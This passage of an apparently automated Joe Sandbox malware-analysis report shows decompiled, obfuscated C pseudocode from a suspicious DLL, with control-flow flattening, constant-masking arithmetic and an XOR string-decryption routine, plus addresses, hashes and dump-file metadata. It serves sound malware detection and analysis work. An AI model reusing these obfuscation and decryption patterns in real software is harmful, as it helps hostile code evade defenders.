                                                                                                                                                                            0x02f6c87e
                                                                                                                                                                            0x02f6c881
                                                                                                                                                                            0x02f6c888
                                                                                                                                                                            0x02f6c889
                                                                                                                                                                            0x02f6c88c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6c88c
                                                                                                                                                                            0x02f6c7f9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6c80b
                                                                                                                                                                            0x02f6c80c
                                                                                                                                                                            0x02f6c811
                                                                                                                                                                            0x02f6c816
                                                                                                                                                                            0x02f6c817
                                                                                                                                                                            0x02f6c819
                                                                                                                                                                            0x02f6c81f
                                                                                                                                                                            0x02f6c823
                                                                                                                                                                            0x02f6c824
                                                                                                                                                                            0x02f6c829
                                                                                                                                                                            0x02f6c837
                                                                                                                                                                            0x02f6c83c
                                                                                                                                                                            0x02f6c83f
                                                                                                                                                                            0x02f6c842
                                                                                                                                                                            0x02f6c849
                                                                                                                                                                            0x02f6c84a
                                                                                                                                                                            0x02f6c84d
                                                                                                                                                                            0x02f6c84d
                                                                                                                                                                            0x02f6c897
                                                                                                                                                                            0x02f6c89c
                                                                                                                                                                            0x02f6c8a1
                                                                                                                                                                            0x02f6c8a1
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: <;M
                                                                                                                                                                            • API String ID: 0-164005337
                                                                                                                                                                            • Opcode ID: c42f6e2da73b9313bb7b92826c9d3606e8458b1fcd4630d2d1ab3e0b4f1cd83e
                                                                                                                                                                            • Instruction ID: 7883c7f2013681b241b79214c1559739e7d2f5be13bdd78b884e58684b7bcea3
                                                                                                                                                                            • Opcode Fuzzy Hash: c42f6e2da73b9313bb7b92826c9d3606e8458b1fcd4630d2d1ab3e0b4f1cd83e
                                                                                                                                                                            • Instruction Fuzzy Hash: 98919A71D00318EBCB18CFA5D98A9EEBBB2FF44354F20814AE612BB250C7B41A45CF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E02F51F38(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                            				char _v556;
                                                                                                                                                                            				intOrPtr _v564;
                                                                                                                                                                            				char _v584;
                                                                                                                                                                            				signed int _v588;
                                                                                                                                                                            				signed int _v592;
                                                                                                                                                                            				signed int _v596;
                                                                                                                                                                            				signed int _v600;
                                                                                                                                                                            				signed int _v604;
                                                                                                                                                                            				signed int _v608;
                                                                                                                                                                            				signed int _v612;
                                                                                                                                                                            				signed int _v616;
                                                                                                                                                                            				signed int _v620;
                                                                                                                                                                            				signed int _v624;
                                                                                                                                                                            				void* _t89;
                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                            				char* _t105;
                                                                                                                                                                            				void* _t119;
                                                                                                                                                                            				signed int* _t125;
                                                                                                                                                                            
                                                                                                                                                                            				_push(E02F5E5C0);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_t102 = __ecx;
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t89);
                                                                                                                                                                            				_v588 = 0xa9001c;
                                                                                                                                                                            				_t125 =  &(( &_v624)[4]);
                                                                                                                                                                            				_v588 = _v588 + 0xfffff841;
                                                                                                                                                                            				_v588 = _v588 ^ 0x00a8f85f;
                                                                                                                                                                            				_t119 = 0x7750dec;
                                                                                                                                                                            				_v596 = 0x801276;
                                                                                                                                                                            				_v596 = _v596 << 8;
                                                                                                                                                                            				_v596 = _v596 ^ 0x801c5a8c;
                                                                                                                                                                            				_v592 = 0xe5da65;
                                                                                                                                                                            				_v592 = _v592 | 0x8d0ca196;
                                                                                                                                                                            				_v592 = _v592 ^ 0x8de55992;
                                                                                                                                                                            				_v612 = 0x74ea46;
                                                                                                                                                                            				_v612 = _v612 >> 6;
                                                                                                                                                                            				_v612 = _v612 | 0x4c0dce94;
                                                                                                                                                                            				_v612 = _v612 ^ 0x4c0245c2;
                                                                                                                                                                            				_v604 = 0x7f8ae0;
                                                                                                                                                                            				_t104 = 0x6f;
                                                                                                                                                                            				_v604 = _v604 / _t104;
                                                                                                                                                                            				_v604 = _v604 + 0x431c;
                                                                                                                                                                            				_v604 = _v604 ^ 0x0002d2ab;
                                                                                                                                                                            				_v608 = 0x66ed0;
                                                                                                                                                                            				_v608 = _v608 >> 5;
                                                                                                                                                                            				_v608 = _v608 * 0x5a;
                                                                                                                                                                            				_v608 = _v608 ^ 0x001395e3;
                                                                                                                                                                            				_v620 = 0x99715e;
                                                                                                                                                                            				_v620 = _v620 + 0xffff5a71;
                                                                                                                                                                            				_v620 = _v620 << 0x10;
                                                                                                                                                                            				_v620 = _v620 + 0xbf19;
                                                                                                                                                                            				_v620 = _v620 ^ 0xcbc1aabc;
                                                                                                                                                                            				_v624 = 0x2a4f9d;
                                                                                                                                                                            				_v624 = _v624 | 0x7ed7085f;
                                                                                                                                                                            				_v624 = _v624 + 0xffff4297;
                                                                                                                                                                            				_v624 = _v624 | 0x5a00af06;
                                                                                                                                                                            				_v624 = _v624 ^ 0x7efc78c9;
                                                                                                                                                                            				_v600 = 0xb3c9ce;
                                                                                                                                                                            				_v600 = _v600 + 0xffff4f2d;
                                                                                                                                                                            				_v600 = _v600 ^ 0x00b0dce6;
                                                                                                                                                                            				_t118 = _v600;
                                                                                                                                                                            				_v616 = 0x17dc9d;
                                                                                                                                                                            				_v616 = _v616 ^ 0xb350768a;
                                                                                                                                                                            				_v616 = _v616 + 0xffff5841;
                                                                                                                                                                            				_v616 = _v616 ^ 0xb3483330;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t119 != 0x26f316f) {
                                                                                                                                                                            						if(_t119 == 0x4832572) {
                                                                                                                                                                            							_v556 = 0x22c;
                                                                                                                                                                            							_t105 =  &_v556;
                                                                                                                                                                            							_t97 = E02F5BD23(_t105, _t118, _v612, _v604, _v608);
                                                                                                                                                                            							_t125 =  &(_t125[3]);
                                                                                                                                                                            							L12:
                                                                                                                                                                            							asm("sbb esi, esi");
                                                                                                                                                                            							_t119 = ( ~_t97 & 0xf2b580e0) + 0xfb9b08f;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t119 == 0x7750dec) {
                                                                                                                                                                            							_v564 = _t102;
                                                                                                                                                                            							_t119 = 0xecc24d5;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t119 == 0x88070fd) {
                                                                                                                                                                            							_t97 = E02F706EC(_v620, _t118, _v624,  &_v556);
                                                                                                                                                                            							_pop(_t105);
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t119 != 0xecc24d5) {
                                                                                                                                                                            							if(_t119 == 0xfb9b08f) {
                                                                                                                                                                            								return E02F71538(_v600, _v616, _t118);
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L18;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(_t105);
                                                                                                                                                                            						_t97 = E02F57603(_v588);
                                                                                                                                                                            						_t118 = _t97;
                                                                                                                                                                            						_t105 = _t105;
                                                                                                                                                                            						__eflags = _t97 - 0xffffffff;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_t119 = 0x4832572;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						L8:
                                                                                                                                                                            						return _t97;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = E02F5E5C0(__eflags,  &_v556,  &_v584);
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						_t119 = 0xfb9b08f;
                                                                                                                                                                            						goto L18;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t119 = 0x88070fd;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            					L18:
                                                                                                                                                                            					__eflags = _t119 - 0x5c72449;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				return _t97;
                                                                                                                                                                            			}























                                                                                                                                                                            0x02f51f42
                                                                                                                                                                            0x02f51f47
                                                                                                                                                                            0x02f51f4e
                                                                                                                                                                            0x02f51f50
                                                                                                                                                                            0x02f51f51
                                                                                                                                                                            0x02f51f52
                                                                                                                                                                            0x02f51f57
                                                                                                                                                                            0x02f51f5f
                                                                                                                                                                            0x02f51f62
                                                                                                                                                                            0x02f51f6c
                                                                                                                                                                            0x02f51f74
                                                                                                                                                                            0x02f51f79
                                                                                                                                                                            0x02f51f86
                                                                                                                                                                            0x02f51f8b
                                                                                                                                                                            0x02f51f93
                                                                                                                                                                            0x02f51f9b
                                                                                                                                                                            0x02f51fa3
                                                                                                                                                                            0x02f51fab
                                                                                                                                                                            0x02f51fb3
                                                                                                                                                                            0x02f51fb8
                                                                                                                                                                            0x02f51fc0
                                                                                                                                                                            0x02f51fc8
                                                                                                                                                                            0x02f51fd6
                                                                                                                                                                            0x02f51fd9
                                                                                                                                                                            0x02f51fdd
                                                                                                                                                                            0x02f51fe5
                                                                                                                                                                            0x02f51fed
                                                                                                                                                                            0x02f51ff5
                                                                                                                                                                            0x02f51fff
                                                                                                                                                                            0x02f52003
                                                                                                                                                                            0x02f5200b
                                                                                                                                                                            0x02f52013
                                                                                                                                                                            0x02f5201b
                                                                                                                                                                            0x02f52020
                                                                                                                                                                            0x02f52028
                                                                                                                                                                            0x02f52030
                                                                                                                                                                            0x02f52038
                                                                                                                                                                            0x02f52040
                                                                                                                                                                            0x02f52048
                                                                                                                                                                            0x02f52050
                                                                                                                                                                            0x02f52058
                                                                                                                                                                            0x02f52060
                                                                                                                                                                            0x02f52068
                                                                                                                                                                            0x02f52070
                                                                                                                                                                            0x02f52074
                                                                                                                                                                            0x02f5207c
                                                                                                                                                                            0x02f52084
                                                                                                                                                                            0x02f5208c
                                                                                                                                                                            0x02f52094
                                                                                                                                                                            0x02f52094
                                                                                                                                                                            0x02f520a6
                                                                                                                                                                            0x02f52146
                                                                                                                                                                            0x02f52152
                                                                                                                                                                            0x02f5215a
                                                                                                                                                                            0x02f5215f
                                                                                                                                                                            0x02f5211f
                                                                                                                                                                            0x02f52123
                                                                                                                                                                            0x02f5212b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5212b
                                                                                                                                                                            0x02f520b2
                                                                                                                                                                            0x02f52132
                                                                                                                                                                            0x02f52136
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f52136
                                                                                                                                                                            0x02f520ba
                                                                                                                                                                            0x02f52118
                                                                                                                                                                            0x02f5211e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5211e
                                                                                                                                                                            0x02f520c2
                                                                                                                                                                            0x02f520c6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f520da
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f520c6
                                                                                                                                                                            0x02f520ee
                                                                                                                                                                            0x02f520f4
                                                                                                                                                                            0x02f520f9
                                                                                                                                                                            0x02f520fc
                                                                                                                                                                            0x02f520fd
                                                                                                                                                                            0x02f52100
                                                                                                                                                                            0x02f52102
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f52102
                                                                                                                                                                            0x02f520e5
                                                                                                                                                                            0x02f520e5
                                                                                                                                                                            0x02f520e5
                                                                                                                                                                            0x02f52173
                                                                                                                                                                            0x02f52175
                                                                                                                                                                            0x02f52181
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f52177
                                                                                                                                                                            0x02f52177
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f52177
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f52183
                                                                                                                                                                            0x02f52183
                                                                                                                                                                            0x02f52183
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Ft
                                                                                                                                                                            • API String ID: 0-1468847975
                                                                                                                                                                            • Opcode ID: 32be494fe358369d402e3309494dde24b023ab0be21cf47ab6555647a7ffc6ab
                                                                                                                                                                            • Instruction ID: eb5cd8c63fb7c5eb622081cde55f62b61ebaff1e54ebdf820775071489114516
                                                                                                                                                                            • Opcode Fuzzy Hash: 32be494fe358369d402e3309494dde24b023ab0be21cf47ab6555647a7ffc6ab
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B518E729093118BC358DF24D88541BBBE1FB94758F044B1DFA9AA2260D7B1CA49CF87
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E02F6E1F8(signed int* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                            				void* _t64;
                                                                                                                                                                            				signed int _t73;
                                                                                                                                                                            				short* _t92;
                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                            				unsigned int _t100;
                                                                                                                                                                            				unsigned int _t101;
                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                            				short* _t111;
                                                                                                                                                                            				signed int* _t112;
                                                                                                                                                                            				signed int* _t113;
                                                                                                                                                                            				signed int _t114;
                                                                                                                                                                            				signed int _t115;
                                                                                                                                                                            				signed int _t116;
                                                                                                                                                                            				unsigned int _t118;
                                                                                                                                                                            				void* _t124;
                                                                                                                                                                            				short _t126;
                                                                                                                                                                            				void* _t128;
                                                                                                                                                                            				void* _t130;
                                                                                                                                                                            
                                                                                                                                                                            				_push( *(_t128 + 0x30));
                                                                                                                                                                            				_push( *(_t128 + 0x30));
                                                                                                                                                                            				_push( *(_t128 + 0x30));
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t64);
                                                                                                                                                                            				 *(_t128 + 0x28) = 0xaa6cff;
                                                                                                                                                                            				_t112 =  &(__ecx[1]);
                                                                                                                                                                            				 *(_t128 + 0x28) =  *(_t128 + 0x28) + 0x5a3e;
                                                                                                                                                                            				 *(_t128 + 0x28) =  *(_t128 + 0x28) << 0xc;
                                                                                                                                                                            				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0xac7afad8;
                                                                                                                                                                            				 *(_t128 + 0x24) = 0xf23620;
                                                                                                                                                                            				_t114 = 0x4f;
                                                                                                                                                                            				 *(_t128 + 0x28) =  *(_t128 + 0x24) / _t114;
                                                                                                                                                                            				_t115 = 0x1d;
                                                                                                                                                                            				 *(_t128 + 0x28) =  *(_t128 + 0x28) / _t115;
                                                                                                                                                                            				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0x0000f47a;
                                                                                                                                                                            				 *(_t128 + 0x24) = 0x6765f0;
                                                                                                                                                                            				 *(_t128 + 0x24) =  *(_t128 + 0x24) | 0x7b5bc89c;
                                                                                                                                                                            				 *(_t128 + 0x24) =  *(_t128 + 0x24) >> 1;
                                                                                                                                                                            				 *(_t128 + 0x24) =  *(_t128 + 0x24) ^ 0x3db51d28;
                                                                                                                                                                            				 *(_t128 + 0x30) = 0xe89ec2;
                                                                                                                                                                            				_t116 = 0x26;
                                                                                                                                                                            				 *(_t128 + 0x2c) =  *(_t128 + 0x30) / _t116;
                                                                                                                                                                            				 *(_t128 + 0x2c) =  *(_t128 + 0x2c) ^ 0x00078a4c;
                                                                                                                                                                            				_t110 =  *__ecx;
                                                                                                                                                                            				_t113 =  &(_t112[1]);
                                                                                                                                                                            				_t73 =  *_t112 ^ _t110;
                                                                                                                                                                            				 *(_t128 + 0x30) = _t110;
                                                                                                                                                                            				 *(_t128 + 0x34) = _t73;
                                                                                                                                                                            				_t118 =  !=  ? (_t73 + 0x00000001 & 0xfffffffc) + 4 : _t73 + 1;
                                                                                                                                                                            				_t92 = E02F5C5D8(_t118 + _t118);
                                                                                                                                                                            				_t130 = _t128 + 0x18;
                                                                                                                                                                            				 *((intOrPtr*)(_t130 + 0x18)) = _t92;
                                                                                                                                                                            				if(_t92 != 0) {
                                                                                                                                                                            					_t126 = 0;
                                                                                                                                                                            					_t111 = _t92;
                                                                                                                                                                            					_t124 =  >  ? 0 :  &(_t113[_t118 >> 2]) - _t113 + 3 >> 2;
                                                                                                                                                                            					if(_t124 != 0) {
                                                                                                                                                                            						_t93 =  *(_t130 + 0x20);
                                                                                                                                                                            						do {
                                                                                                                                                                            							_t99 =  *_t113;
                                                                                                                                                                            							_t113 =  &(_t113[1]);
                                                                                                                                                                            							_t100 = _t99 ^ _t93;
                                                                                                                                                                            							 *_t111 = _t100 & 0x000000ff;
                                                                                                                                                                            							_t111 = _t111 + 8;
                                                                                                                                                                            							 *((short*)(_t111 - 6)) = _t100 >> 0x00000008 & 0x000000ff;
                                                                                                                                                                            							_t101 = _t100 >> 0x10;
                                                                                                                                                                            							_t126 = _t126 + 1;
                                                                                                                                                                            							 *((short*)(_t111 - 4)) = _t101 & 0x000000ff;
                                                                                                                                                                            							 *((short*)(_t111 - 2)) = _t101 >> 0x00000008 & 0x000000ff;
                                                                                                                                                                            						} while (_t126 < _t124);
                                                                                                                                                                            						_t92 =  *((intOrPtr*)(_t130 + 0x1c));
                                                                                                                                                                            					}
                                                                                                                                                                            					 *((short*)(_t92 +  *(_t130 + 0x24) * 2)) = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t92;
                                                                                                                                                                            			}






















                                                                                                                                                                            0x02f6e1fe
                                                                                                                                                                            0x02f6e202
                                                                                                                                                                            0x02f6e206
                                                                                                                                                                            0x02f6e20b
                                                                                                                                                                            0x02f6e20c
                                                                                                                                                                            0x02f6e211
                                                                                                                                                                            0x02f6e219
                                                                                                                                                                            0x02f6e21c
                                                                                                                                                                            0x02f6e226
                                                                                                                                                                            0x02f6e22b
                                                                                                                                                                            0x02f6e233
                                                                                                                                                                            0x02f6e241
                                                                                                                                                                            0x02f6e246
                                                                                                                                                                            0x02f6e250
                                                                                                                                                                            0x02f6e255
                                                                                                                                                                            0x02f6e25b
                                                                                                                                                                            0x02f6e263
                                                                                                                                                                            0x02f6e26b
                                                                                                                                                                            0x02f6e273
                                                                                                                                                                            0x02f6e277
                                                                                                                                                                            0x02f6e27f
                                                                                                                                                                            0x02f6e28b
                                                                                                                                                                            0x02f6e28e
                                                                                                                                                                            0x02f6e292
                                                                                                                                                                            0x02f6e29a
                                                                                                                                                                            0x02f6e29e
                                                                                                                                                                            0x02f6e2a1
                                                                                                                                                                            0x02f6e2a3
                                                                                                                                                                            0x02f6e2a7
                                                                                                                                                                            0x02f6e2bb
                                                                                                                                                                            0x02f6e2da
                                                                                                                                                                            0x02f6e2dc
                                                                                                                                                                            0x02f6e2df
                                                                                                                                                                            0x02f6e2e5
                                                                                                                                                                            0x02f6e2ed
                                                                                                                                                                            0x02f6e2ef
                                                                                                                                                                            0x02f6e300
                                                                                                                                                                            0x02f6e305
                                                                                                                                                                            0x02f6e307
                                                                                                                                                                            0x02f6e30b
                                                                                                                                                                            0x02f6e30b
                                                                                                                                                                            0x02f6e30d
                                                                                                                                                                            0x02f6e310
                                                                                                                                                                            0x02f6e315
                                                                                                                                                                            0x02f6e31d
                                                                                                                                                                            0x02f6e323
                                                                                                                                                                            0x02f6e327
                                                                                                                                                                            0x02f6e330
                                                                                                                                                                            0x02f6e331
                                                                                                                                                                            0x02f6e338
                                                                                                                                                                            0x02f6e33c
                                                                                                                                                                            0x02f6e340
                                                                                                                                                                            0x02f6e340
                                                                                                                                                                            0x02f6e34b
                                                                                                                                                                            0x02f6e34b
                                                                                                                                                                            0x02f6e357

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: >Z
                                                                                                                                                                            • API String ID: 0-2342695272
                                                                                                                                                                            • Opcode ID: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
                                                                                                                                                                            • Instruction ID: f06876d2e40cc0d218179bfc0d5a7f20a0c4e6c67bef39aa39a4db1b7cd7e8e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 8d1f742a32db50f7dddfc35a7796f107023b2d8a4909f84100ef567bcb9ec99c
                                                                                                                                                                            • Instruction Fuzzy Hash: 0641B272A183119BC304DF29C48586BFBE1FFC8758F484A6EF989A7250D774DA05CB86
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E02F555FF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				char _v60;
                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				void* _t75;
                                                                                                                                                                            				void* _t84;
                                                                                                                                                                            				signed int _t88;
                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                            				void* _t92;
                                                                                                                                                                            				intOrPtr _t109;
                                                                                                                                                                            				signed int* _t112;
                                                                                                                                                                            
                                                                                                                                                                            				_t108 = _a12;
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t75);
                                                                                                                                                                            				_v68 = 0x7ffd4d;
                                                                                                                                                                            				_t109 = 0;
                                                                                                                                                                            				_v64 = 0;
                                                                                                                                                                            				_t112 =  &(( &_v96)[5]);
                                                                                                                                                                            				_v80 = 0x808dec;
                                                                                                                                                                            				_v80 = _v80 << 7;
                                                                                                                                                                            				_t92 = 0x1c7cd09;
                                                                                                                                                                            				_t88 = 0x24;
                                                                                                                                                                            				_v80 = _v80 * 0x7a;
                                                                                                                                                                            				_v80 = _v80 ^ 0xa1de2a47;
                                                                                                                                                                            				_v84 = 0x460263;
                                                                                                                                                                            				_v84 = _v84 + 0xffffc38b;
                                                                                                                                                                            				_v84 = _v84 + 0xffffb2e6;
                                                                                                                                                                            				_v84 = _v84 ^ 0x0042c6ce;
                                                                                                                                                                            				_v88 = 0x2af47a;
                                                                                                                                                                            				_v88 = _v88 + 0xfffff2b2;
                                                                                                                                                                            				_v88 = _v88 ^ 0xf3d8a894;
                                                                                                                                                                            				_v88 = _v88 ^ 0xf3ffbcf7;
                                                                                                                                                                            				_v92 = 0xf8385b;
                                                                                                                                                                            				_v92 = _v92 / _t88;
                                                                                                                                                                            				_v92 = _v92 + 0xffff302a;
                                                                                                                                                                            				_v92 = _v92 ^ 0x00085c4c;
                                                                                                                                                                            				_v96 = 0xec2811;
                                                                                                                                                                            				_t89 = 0x6c;
                                                                                                                                                                            				_v96 = _v96 / _t89;
                                                                                                                                                                            				_v96 = _v96 | 0xeb0c0969;
                                                                                                                                                                            				_v96 = _v96 ^ 0x646fa875;
                                                                                                                                                                            				_v96 = _v96 ^ 0x8f64cfef;
                                                                                                                                                                            				_v72 = 0x6e85b8;
                                                                                                                                                                            				_v72 = _v72 + 0x990a;
                                                                                                                                                                            				_v72 = _v72 + 0xffff81c6;
                                                                                                                                                                            				_v72 = _v72 ^ 0x00684c5c;
                                                                                                                                                                            				_v76 = 0xd1f521;
                                                                                                                                                                            				_v76 = _v76 | 0xdf7ffbcd;
                                                                                                                                                                            				_v76 = _v76 ^ 0xdff37ac7;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t92 != 0x19e170b) {
                                                                                                                                                                            						if(_t92 == 0x1c7cd09) {
                                                                                                                                                                            							_t92 = 0x19e170b;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t92 == 0x305f804) {
                                                                                                                                                                            								_t84 = E02F72BF0(_v88,  &_v60, _v92, _v96, _t108);
                                                                                                                                                                            								_t112 =  &(_t112[3]);
                                                                                                                                                                            								__eflags = _t84;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									_t92 = 0xecd5788;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t117 = _t92 - 0xecd5788;
                                                                                                                                                                            								if(_t92 != 0xecd5788) {
                                                                                                                                                                            									goto L11;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									E02F69D3E( &_v60, _v72, _t117, _v76, _t108 + 0x24);
                                                                                                                                                                            									_t109 =  !=  ? 1 : _t109;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L6:
                                                                                                                                                                            						return _t109;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F522A6(_a8, _v80,  &_v60, _v84);
                                                                                                                                                                            					_t112 =  &(_t112[2]);
                                                                                                                                                                            					_t92 = 0x305f804;
                                                                                                                                                                            					L11:
                                                                                                                                                                            					__eflags = _t92 - 0xfbce5f5;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				goto L6;
                                                                                                                                                                            			}




















                                                                                                                                                                            0x02f55606
                                                                                                                                                                            0x02f5560a
                                                                                                                                                                            0x02f5560b
                                                                                                                                                                            0x02f5560f
                                                                                                                                                                            0x02f55613
                                                                                                                                                                            0x02f55614
                                                                                                                                                                            0x02f55615
                                                                                                                                                                            0x02f5561a
                                                                                                                                                                            0x02f55622
                                                                                                                                                                            0x02f55624
                                                                                                                                                                            0x02f55628
                                                                                                                                                                            0x02f5562b
                                                                                                                                                                            0x02f55635
                                                                                                                                                                            0x02f5563a
                                                                                                                                                                            0x02f5564b
                                                                                                                                                                            0x02f5564e
                                                                                                                                                                            0x02f55652
                                                                                                                                                                            0x02f5565a
                                                                                                                                                                            0x02f55662
                                                                                                                                                                            0x02f5566a
                                                                                                                                                                            0x02f55672
                                                                                                                                                                            0x02f5567a
                                                                                                                                                                            0x02f55682
                                                                                                                                                                            0x02f5568a
                                                                                                                                                                            0x02f55692
                                                                                                                                                                            0x02f5569a
                                                                                                                                                                            0x02f556aa
                                                                                                                                                                            0x02f556ae
                                                                                                                                                                            0x02f556b6
                                                                                                                                                                            0x02f556be
                                                                                                                                                                            0x02f556ca
                                                                                                                                                                            0x02f556d2
                                                                                                                                                                            0x02f556d6
                                                                                                                                                                            0x02f556de
                                                                                                                                                                            0x02f556e6
                                                                                                                                                                            0x02f556ee
                                                                                                                                                                            0x02f556f6
                                                                                                                                                                            0x02f556fe
                                                                                                                                                                            0x02f55706
                                                                                                                                                                            0x02f5570e
                                                                                                                                                                            0x02f55716
                                                                                                                                                                            0x02f5571e
                                                                                                                                                                            0x02f55726
                                                                                                                                                                            0x02f55726
                                                                                                                                                                            0x02f55730
                                                                                                                                                                            0x02f55788
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f55732
                                                                                                                                                                            0x02f55738
                                                                                                                                                                            0x02f55778
                                                                                                                                                                            0x02f5577d
                                                                                                                                                                            0x02f55780
                                                                                                                                                                            0x02f55782
                                                                                                                                                                            0x02f55784
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f55784
                                                                                                                                                                            0x02f5573a
                                                                                                                                                                            0x02f5573a
                                                                                                                                                                            0x02f5573c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5573e
                                                                                                                                                                            0x02f5574e
                                                                                                                                                                            0x02f5575a
                                                                                                                                                                            0x02f5575a
                                                                                                                                                                            0x02f5573c
                                                                                                                                                                            0x02f55738
                                                                                                                                                                            0x02f5575e
                                                                                                                                                                            0x02f55766
                                                                                                                                                                            0x02f55766
                                                                                                                                                                            0x02f5579d
                                                                                                                                                                            0x02f557a2
                                                                                                                                                                            0x02f557a5
                                                                                                                                                                            0x02f557aa
